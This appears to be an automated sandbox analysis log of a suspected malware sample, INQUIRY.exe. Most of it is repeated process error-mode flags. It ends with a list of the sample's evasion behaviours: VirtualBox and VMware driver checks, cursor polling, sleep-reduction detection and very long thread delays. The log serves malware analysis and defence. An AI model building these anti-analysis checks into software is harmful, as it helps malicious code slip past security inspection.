                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    barindex
                    Contains functionality to detect sleep reduction / modificationsShow sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00430D080_2_00430D08
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00430D080_2_00430D08
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_00430D082_2_00430D08
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\VBoxMouse.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\vmmouse.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\VBoxGuest.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\vmhgfs.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\VBoxMouse.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\vmmouse.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\VBoxGuest.sys
                    Source: C:\Users\user\Desktop\INQUIRY.exeFile opened / queried: C:\Windows\system32\drivers\vmhgfs.sys
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,6_2_00408836
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,6_2_00408836
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,0_2_00454E54
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,0_2_00454E54
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,2_2_00454E54
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 300000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477
